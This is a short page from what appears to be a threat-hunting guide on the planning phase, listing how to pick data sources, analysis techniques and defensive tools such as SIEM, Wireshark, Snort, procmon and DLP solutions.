Formulate

Identify data sources needed for the hunt based on the hypothesis
Determine analysis techniques needed to answer question from the hypothesis
Understand the tools required to gather and analyze data

Data sources

Identify relevant data sources, based on developed hypotheses:

Evaluate potential data sources in the environment
Determine if a specific data source offers any evidence for the hypotheses
Validate feasibility for collection of data from the data sources

Analysis techniques

Identify what analysis techniques should be used:

Determine the tactics, techniques and procedures to be used
Selection criteria should be driven by the developed hypotheses
The employed analysis techniques should answer questions from the hypotheses

Tools

After identifying the data sources and analysis techniques, the next step is to scope the tools needed for the hunt

Here are some examples:

Security Information and Event Management (SIEM)
Sniffing, IDS/IPS and process monitoring tools
- Wireshark, Snort, procmon
Packet capture solutions
DLP solutions

PreviousScoping and hypothesis development NextExecution

Last updated 4 months ago